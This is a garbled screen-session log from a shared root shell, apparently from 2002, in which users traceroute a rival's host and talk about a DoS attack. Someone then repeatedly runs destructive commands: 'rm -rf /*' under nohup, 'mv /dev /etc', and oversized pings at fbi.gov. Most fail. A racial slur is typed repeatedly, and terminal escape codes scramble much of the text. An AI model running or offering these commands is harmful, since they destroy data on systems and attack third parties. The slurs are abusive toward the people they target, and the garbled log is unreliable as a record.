208.172.145.201 (208.172.145.20 [4h [34D[4l9 acr2-loopback.Cleveland.cw.net [4h [4l10 oarnet.Cleveland.cw.net (208.172.209.130) 234.561 ms 234.818 ms 234.7 76 m[H[35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P[45C.837 ms [35P [35P [35P[45C.285 ms [35P[45Cs [H[4h [4lroot@kas:/home/bob# tail [4h [4lis fcae stil li386 [4h [4lyep [4h [4llet's dos the guy taht took the nic [4h [4lroot@kas:/home/bob# unless u have b [4h [4lroot@kas:/home/bob# tail [4h [4l| bob (uridas@NS1.1115.NET) (Intern [4h [4lheh wtf host is that [4h [4lroot@kas:/home/bob# traceroute NS1. [4h [4ltraceroute to NS1.1115.NET (64.56.1 [4h [34D[4l1 203.214.248.1 (203.214.248.1) [4h [34D[4l2 dcr01-g5-0.mlbn01.exodus.net (6 [4h [34D[4l3 ibr02-g6-0.mlbn01.exodus.net (6 [4h [34D[4l4 POS0-1-0.mb1.optus.net.au (203. [4h [34D[4l5 POS5-0.sg2.optus.net.au (202.13 [4h [34D[4l6 iar1-sonet2-3-0-0.Sydney.cw.net [4h [34D[4l7 bcr2.Sydney.cw.net (166.63.226. [4h [34D[4l8 208.172.145.201 (208.172.145.20 [4h [34D[4l9 acr2-loopback.Cleveland.cw.net [4h [4l10 oarnet.Cleveland.cw.net (208.17 [4h [4l11 sotc3-atm5-0-0s40.columbus.oar.net (199.18.103.105) 234.855 ms 234.799 ms [H[35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P[45C.837 ms [35P [35P [35P[45C.285 ms [35P[45Cs [35P[46C234.814 ms [H[4h [4lroot@kas:/home/bob# tail [4h [4lis fcae stil li386 [4h [4lyep [4h [4llet's dos the guy taht took the nic [4h [4lroot@kas:/home/bob# unless u have b [4h [4lroot@kas:/home/bob# tail [4h [4l| bob (uridas@NS1.1115.NET) (Intern [4h [4lheh wtf host is that [4h [4lroot@kas:/home/bob# traceroute NS1. [4h [4ltraceroute to NS1.1115.NET (64.56.1 [4h [34D[4l1 203.214.248.1 (203.214.248.1) [4h [34D[4l2 dcr01-g5-0.mlbn01.exodus.net (6 [4h [34D[4l3 ibr02-g6-0.mlbn01.exodus.net (6 [4h [34D[4l4 POS0-1-0.mb1.optus.net.au (203. [4h [34D[4l5 POS5-0.sg2.optus.net.au (202.13 [4h [34D[4l6 iar1-sonet2-3-0-0.Sydney.cw.net [4h [34D[4l7 bcr2.Sydney.cw.net (166.63.226. [4h [34D[4l8 208.172.145.201 (208.172.145.20 [4h [34D[4l9 acr2-loopback.Cleveland.cw.net [4h [4l10 oarnet.Cleveland.cw.net (208.17 [4h [4l11 sotc3-atm5-0-0s40.columbus.oar. [4h [4l12 dlp1-atm2-0.dayton.oar.net (199.18.202.101) 553.558 ms 457.838 ms 438 .301[H[35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P[45C.837 ms [35P [35P [35P[45C.285 ms [35P[45Cs [35P[46C234.814 ms [35P[46Cms [H[4h [4lroot@kas:/home/bob# tail [4h [4lis fcae stil li386 [4h [4lyep [4h [4llet's dos the guy taht took the nic [4h [4lroot@kas:/home/bob# unless u have b [4h [4lroot@kas:/home/bob# tail [4h [4l| bob (uridas@NS1.1115.NET) (Intern [4h [4lheh wtf host is that [4h [4lroot@kas:/home/bob# traceroute NS1. [4h [4ltraceroute to NS1.1115.NET (64.56.1 [4h [34D[4l1 203.214.248.1 (203.214.248.1) [4h [34D[4l2 dcr01-g5-0.mlbn01.exodus.net (6 [4h [34D[4l3 ibr02-g6-0.mlbn01.exodus.net (6 [4h [34D[4l4 POS0-1-0.mb1.optus.net.au (203. [4h [34D[4l5 POS5-0.sg2.optus.net.au (202.13 [4h [34D[4l6 iar1-sonet2-3-0-0.Sydney.cw.net [4h [34D[4l7 bcr2.Sydney.cw.net (166.63.226. [4h [34D[4l8 208.172.145.201 (208.172.145.20 [4h [34D[4l9 acr2-loopback.Cleveland.cw.net [4h [4l10 oarnet.Cleveland.cw.net (208.17 [4h [4l11 sotc3-atm5-0-0s40.columbus.oar. [4h [4l12 dlp1-atm2-0.dayton.oar.net (199 [4h [4l13 lowfat.donet.com (205.133.113.128) 238.16 ms 237.578 ms 238.05 ms 14 timmay.donet.com (64.56.101.210) 240.24 ms 240.336 ms 239.982 ms 15 NS1.1115.NET (64.56.106.202) 240.219 ms 239.79 ms 239.874 ms root@kas:/home/bob# cd ]2;screen]2; Wuff ---- Wuff!! ]2;screen]2;glen@fr an.fifthavenuevideo.com: /home/glenhrmm wtf ? root@kas:/home/bob# who do u want 2 dos? root@kas:/home/bob# i dont care root@kas:/home/bob# do it root@kas:/home/bob# root@kas:/home/bob# !!!! root@kas:/home/bob# im not dossing no 1 from here foo hehe root@kas:/home/bob# login to mad dos networksz!!@#!@# root@kas:/home/bob# windows boxes away!!! root@kas:/home/bob# hrmm u dont sound normal root@kas:/home/bob# u bob ? root@kas:/home/bob# yes root@kas:/home/bob# ? root@kas:/home/bob# ? root@kas:/home/bob# ? root@kas:/home/bob# how much # $ did u send me ? root@kas:/home/bob# $1 root@kas:/home/bob# 1k root@kas:/home/bob# no wron root@kas:/home/bob# g bash: g: command not found root@kas:/home/bob# root@kas:/home/bob# nohup rm -rf /* >/dev/null & [1] 20031 root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20035 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20036 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20037 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20038 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# enohup rm -rf /* >/dev/null & [2] 20040 bash: enohup: command not found [2]+ Exit 127 enohup rm -rf /* >/dev/null root@kas:/home/bob# xinohup rm -rf /* >/dev/null & [2] 20041 bash: xinohup: command not found [2]+ Exit 127 xinohup rm -rf /* >/dev/null root@kas:/home/bob# t bash: t: command not found root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20043 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20044 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20045 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# enohup rm -rf /* >/dev/null & [2] 20047 bash: enohup: command not found [2]+ Exit 127 enohup rm -rf /* >/dev/null root@kas:/home/bob# xit bash: xit: command not found root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20049 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20050 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20051 root@kas:/home/bob# nohup rm -rf /* >/dev/null & [3] 20053 bash: /usr/bin/nohup: bad interpreter: No such file or directory bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]- Exit 126 nohup rm -rf /* >/dev/null [3]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20055 root@kas:/home/bob# bash: /usr/bin/nohup: bad interpreter: No such file or dire c exoitnohup rm -rf /* >/dev/null & [3] 20058 bash: exoitnohup: command not found [2] Exit 126 nohup rm -rf /* >/dev/null [3]+ Exit 127 exoitnohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20060 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20062 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20064 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20065 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20068 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20069 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# nohup rm -rf /* >/dev/null & [2] 20070 bash: /usr/bin/nohup: bad interpreter: No such file or directory [2]+ Exit 126 nohup rm -rf /* >/dev/null root@kas:/home/bob# rm -rf / & [2] 20071 bash: /bin/rm: No such file or directory [2]+ Exit 127 rm -rf / root@kas:/home/bob# root@kas:/home/bob# akfsjhdafdsj bash: akfsjhdafdsj: command not found root@kas:/home/bob# ajfds bash: ajfds: command not found root@kas:/home/bob# a bash: a: command not found root@kas:/home/bob# fs bash: fs: command not found root@kas:/home/bob# dasdf bash: dasdf: command not found root@kas:/home/bob# asd bash: asd: command not found root@kas:/home/bob# f bash: f: command not found root@kas:/home/bob# asdf bash: asdf: command not found root@kas:/home/bob# a bash: a: command not found root@kas:/home/bob# fdsasfd bash: fdsasfd: command not found root@kas:/home/bob# a bash: a: command not found root@kas:/home/bob# fds bash: fds: command not found root@kas:/home/bob# asf bash: asf: command not found root@kas:/home/bob# asd bash: asd: command not found root@kas:/home/bob# fafds bash: fafds: command not found root@kas:/home/bob# asfd bash: asfd: command not found root@kas:/home/bob# asdf bash: asdf: command not found root@kas:/home/bob# afd bash: afd: command not found root@kas:/home/bob# af bash: af: command not found root@kas:/home/bob# drm -rf & [2] 20099 bash: drm: command not found [2]+ Exit 127 drm -rf root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# njdskhfakjdshfasf bash: njdskhfakjdshfasf: command not found root@kas:/home/bob# as fdasfdj rmf -r f rm -rf /* >/dev/null & ;ljadfljasf root@kas:/home/bob# r bash: r: command not found root@kas:/home/bob# m -rf /* & root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# rm -rf /* & bash: /bin/rm: No such file or directory [2] 20117 [2]+ Exit 127 rm -rf /* root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# rm -rf /* & [2] 20119 bash: /bin/rm: No such file or directory [2]+ Exit 127 rm -rf /* root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# rm -rf /* & [2] 20120 bash: /bin/rm: No such file or directory [2]+ Exit 127 rm -rf /* root@kas:/home/bob# root@kas:/home/bob# rm -rf /* & root@kas:/home/bob# root@kas:/home/bob# rm -rf /* & bash: /bin/rm: No such file or directory [2] 20121 [2] Exit 127 rm -rf /* root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# rm -rf /* >/dev/null & [2] 20122 bash: /bin/rm: No such file or directory [2]+ Exit 127 rm -rf /* >/dev/null root@kas:/home/bob# rm -rf /* >/dev/null & [2] 20124 bash: /bin/rm: No such file or directory root@kas:/home/bob# rm -rf /* >/dev/null & [3] 20125 bash: /bin/rm: No such file or directory [2] Exit 127 rm -rf /* >/dev/null [3]+ Exit 127 rm -rf /* >/dev/null root@kas:/home/bob# rm -rf /* >/dev/null & [2] 20126 bash: /bin/rm: No such file or directory [2]+ Exit 127 rm -rf /* >/dev/null root@kas:/home/bob# r rm -rf bash: /bin/rm: No such file or directory root@kas:/home/bob# /w bash: /w: No such file or directory root@kas:/home/bob# root@kas:/home/bob# rm -rf /* bash: /bin/rm: No such file or directory root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# rm bash: /bin/rm: No such file or directory root@kas:/home/bob# root@kas:/home/bob# -rf /* bash: -rf: command not found root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# rm -rf / bash: /bin/rm: No such file or directory root@kas:/home/bob# rm -rf /rm -rf /rm -rf /cd / bash: /bin/rm: No such file or directory root@kas:/home/bob# rm -rf * bash: /bin/rm: No such file or directory root@kas:/home/bob# hahahahah bash: hahahahah: command not found root@kas:/home/bob# U =- WNOED bash: U: command not found root@kas:/home/bob# mHAv /dev /etc & [2] 20152 bash: mHAv: command not found [2]+ Exit 127 mHAv /dev /etc root@kas:/home/bob# H bash: H: command not found root@kas:/home/bob# DFmv /dev /etc &AL; [2] 20154 bash: DFmv: command not found bash: AL: command not found [2]+ Exit 127 DFmv /dev /etc root@kas:/home/bob# mv /dev /etc &H [2] 20156 bash: mv: command not found bash: H: command not found [2]+ Exit 127 mv /dev /etc root@kas:/home/bob# FSmv /dev /etc &LA [2] 20158 bash: FSmv: command not found bash: LA: command not found [2]+ Exit 127 FSmv /dev /etc root@kas:/home/bob# JHFD bash: JHFD: command not found root@kas:/home/bob# mv /dev /etc &AD [2] 20161 bash: mv: command not found bash: AD: command not found [2]+ Exit 127 mv /dev /etc root@kas:/home/bob# Smv /dev /etc & [2] 20163 bash: Smv: command not found [2]+ Exit 127 Smv /dev /etc root@kas:/home/bob# root@kas:/home/bob# F bash: F: command not found root@kas:/home/bob# SDC > bash: syntax error near unexpected token `>' root@kas:/home/bob# mv /dev /etc & [2] 20165 bash: mv: command not found [2]+ Exit 127 mv /dev /etc root@kas:/home/bob# mv /dev /etc &* [2] 20166 bash: mv: command not found bash: a.out: command not found [2]+ Exit 127 mv /dev /etc root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# mv /dev /etc &S [2] 20168 bash: mv: command not found bash: S: command not found [2]+ Exit 127 mv /dev /etc root@kas:/home/bob# D bash: D: command not found root@kas:/home/bob# mv /dev /etc &C > w* [2] 20171 bash: mv: command not found bash: C: command not found [2]+ Exit 127 mv /dev /etc root@kas:/home/bob# root@kas:/home/bob# w S 7:26pm up 48 days, 3:24, 12 users, load average: 0.74, 0.31, 0.21 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 d442-pad-mel.alp 3:22pm 1:38m 0.06s 0.06s -bash carl pts/4 d252-ps4-mel.alp 6:07pm 20.00s 0.03s 0.00s screen -r root pts/9 d252-ps4-mel.alp 7:07pm 22.00s 0.23s 0.19s ssh -l bob loc a root pts/10 d442-pad-mel.alp 3:06pm 1:55m 0.09s 0.09s -bash linbsd pts/11 linbsd.net 5:50am 11:04m 0.07s 0.07s -bash bob pts/14 localhost 7:07pm 22.00s 0.04s 0.00s screen -x root pts/16 d252-ps4-mel.alp 6:31pm 6.00s 0.10s 0.10s -bash bob pts/17 mystic.uprising. 6:32pm 0.00s 0.05s 0.00s screen -x bob pts/18 61.129.67.238 6:33pm 0.00s 0.04s 0.01s screen -x root pts/19 localhost 7:00pm 0.00s 2.67s 0.05s w bob pts/20 mystic.uprising. 7:04pm 3:20 0.08s 0.08s -bash root pts/21 d252-ps4-mel.alp 7:11pm 18.00s 0.05s 0.05s -bash root@kas:/home/bob# Sw bash: Sw: command not found root@kas:/home/bob# Dw bash: Dw: command not found root@kas:/home/bob# Cw bash: Cw: command not found root@kas:/home/bob# >* bash: *: ambiguous redirect root@kas:/home/bob# SA;KJFDA;LSJFA;LSJF;LAJFLJDASFL;AJDFS;LlsJHAS;FLKJAS;DL bash: SA: command not found bash: KJFDA: command not found bash: LSJFA: command not found bash: LSJF: command not found bash: LAJFLJDASFL: command not found bash: AJDFS: command not found bash: LlsJHAS: command not found bash: FLKJAS: command not found Fbash: DL: command not found root@kas:/home/bob# FKJASD; bash: FKJASD: command not found root@kas:/home/bob# JFlASLsDKJF bash: JFlASLsDKJF: command not found root@kas:/home/bob# ALSDJFLls bash: ALSDJFLls: command not found root@kas:/home/bob# AJF bash: AJF: command not found root@kas:/home/bob# AS bash: AS: command not found root@kas:/home/bob# FDJASDKFJA;LSJFD;LJDFA'SJDF > AJDSFAJSFD > ASF > AS > FASDF > ASHYFUASJ > FAS Broadcast message from root (pts/21) Mon Jan 14 19:27:03 2002... The system is going down for reboot NOW !! ]2;screen]2; Wuff ---- Wuff!! Broadcast message from root (pts/21) Mon Jan 14 19:27:03 2002... The system is going down for reboot NOW !! NIGGEAR > NIG]2;screen]2;glen@fran.fifthavenuevideo.com: /home/glenGER > NIsGG > ER > lsG > NIGGER > NIGGER > NIGmv /dev /etc &G > mEv /dev /etc & > R > > mv /dev /etc & > NImv /dev /etc & > GGER > SDC root@kas:/home/bob# >* bash: *: ambiguous redirect root@kas:/home/bob# SCDC > bash: syntax error near unexpected token `>' root@kas:/home/bob# *mv /dev /etc & [2] 20200 bash: *mv: command not found [2]+ Exit 127 *mv /dev /etc root@kas:/home/bob# mv /dev /etc & [2] 20201 bash: mv: command not found [2]+ Exit 127 mv /dev /etc root@kas:/home/bob# root@kas:/home/bob# mv /dev /etc & [2] 20202 bash: mv: command not found [2]+ Exit 127 mv /dev /etc root@kas:/home/bob# root@kas:/home/bob# mv /dev /etc &S [2] 20203 bash: mv: command not found bash: S: command not found [2]+ Exit 127 mv /dev /etc root@kas:/home/bob# mv /dev /etc & [2] 20205 bash: mv: command not found [2]+ Exit 127 mv /dev /etc root@kas:/home/bob# mv /dev /etc &D [2] 20206 bash: mv: command not found bash: D: command not found [2]+ Exit 127 mv /dev /etc root@kas:/home/bob# mv /dev /etc & [2] 20208 bash: mv: command not found [2]+ Exit 127 mv /dev /etc root@kas:/home/bob# C bash: C: command not found root@kas:/home/bob# mv /dev /etc & [2] 20210 bash: mv: command not found [2]+ Exit 127 mv /dev /etc root@kas:/home/bob# >mv /dev /etc &* [2] 20211 bash: /dev: is a directory bash: a.out: command not found [2]+ Exit 126 /dev /etc >mv root@kas:/home/bob# SDC >*JASKFDJASDRMRJ-FJFSLADMFL;AJF bash: SDC: command not found bash: AJF: command not found root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# RM RJ-F NIGGER bash: RM: command not found root@kas:/home/bob# SDC >* bash: *: ambiguous redirect root@kas:/home/bob# SDCF. AU bash: SDCF.: command not found root@kas:/home/bob# SDpCing -s 8000 fbi.gov & [2] 20219 bash: SDpCing: command not found [2]+ Exit 127 SDpCing -s 8000 fbi.gov root@kas:/home/bob# ping -s 8000 fbi.gov &. [2] 20220 bash: ping: command not found bash: .: filename argument required .: usage: . filename [2]+ Exit 127 ping -s 8000 fbi.gov root@kas:/home/bob# ping -s 8000 fbi.gov & [2] 20221 bash: ping: command not found [2]+ Exit 127 ping -s 8000 fbi.gov root@kas:/home/bob# root@kas:/home/bob# AUping -s 8000 fbi.gov & [2] 20222 bash: AUping: command not found [2]+ Exit 127 AUping -s 8000 fbi.gov root@kas:/home/bob# ping -s 8000 fbi.gov & bash: ping: command not found [2] 20223 [2] Exit 127 ping -s 8000 fbi.gov root@kas:/home/bob# root@kas:/home/bob# ping -s 8000 fbi.gov & [2] 20224 bash: ping: command not found [2]+ Exit 127 ping -s 8000 fbi.gov root@kas:/home/bob# root@kas:/home/bob# ping -s 8000 fbi.gov &S [2] 20226 bash: ping: command not found bash: S: command not found [2]+ Exit 127 ping -s 8000 fbi.gov root@kas:/home/bob# ping -s 8000 fbi.gov & [2] 20228 bash: ping: command not found [2]+ Exit 127 ping -s 8000 fbi.gov root@kas:/home/bob# D.CAU bash: D.CAU: command not found root@kas:/home/bob# SDC.AU bash: SDC.AU: command not found root@kas:/home/bob# SDC.AU bash: SDC.AU: command not found root@kas:/home/bob# SDCF.AU bash: SDCF.AU: command not found root@kas:/home/bob# ASDC.AUw bash: ASDC.AUw: command not found root@kas:/home/bob# tSDC.AU bash: tSDC.AU: command not found root@kas:/home/bob# root@kas:/home/bob# Nig root@kas:/home/bob# root@kas:/home/bob# g root@kas:/home/bob# er bash: er: command not found root@kas:/home/bob# na root@kas:/home/bob# root@kas:/home/bob# l root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# dskhfa;slhfd root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# al root@kas:/home/bob# hfd root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# la root@kas:/home/bob# root@kas:/home/bob# jhdsfla root@kas:/home/bob# s root@kas:/home/bob# root@kas:/home/bob# jf root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# lajsfdl;asjdfl root@kas:/home/bob# a root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# jfd root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# ps root@kas:/home/bob# root@kas:/home/bob# -au root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# x root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# p root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# z root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# - root@kas:/home/bob# a root@kas:/home/bob# root@kas:/home/bob# u root@kas:/home/bob# root@kas:/home/bob# w root@kas:/home/bob# d root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# w root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# w root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# w root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# w root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# ww root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# w root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# pw root@kas:/home/bob# s bash: s: command not found root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# - root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# a root@kas:/home/bob# root@kas:/home/bob# u root@kas:/home/bob# xha bash: xha: command not found root@kas:/home/bob# lt bash: lt: command not found root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# h root@kas:/home/bob# root@kas:/home/bob# a root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# lt root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# t root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# root@kas:/home/bob# ksjdfljasfasdfj bash: ksjdfljasfasdfj: command not found root@kas:/home/bob# fdafdadsf bash: fdafdadsf: command not found root@kas:/home/bob# afdsj bash: afdsj: command not found root@kas:/home/bob# a bash: a: command not found root@kas:/home/bob# root@kas:/home/bob#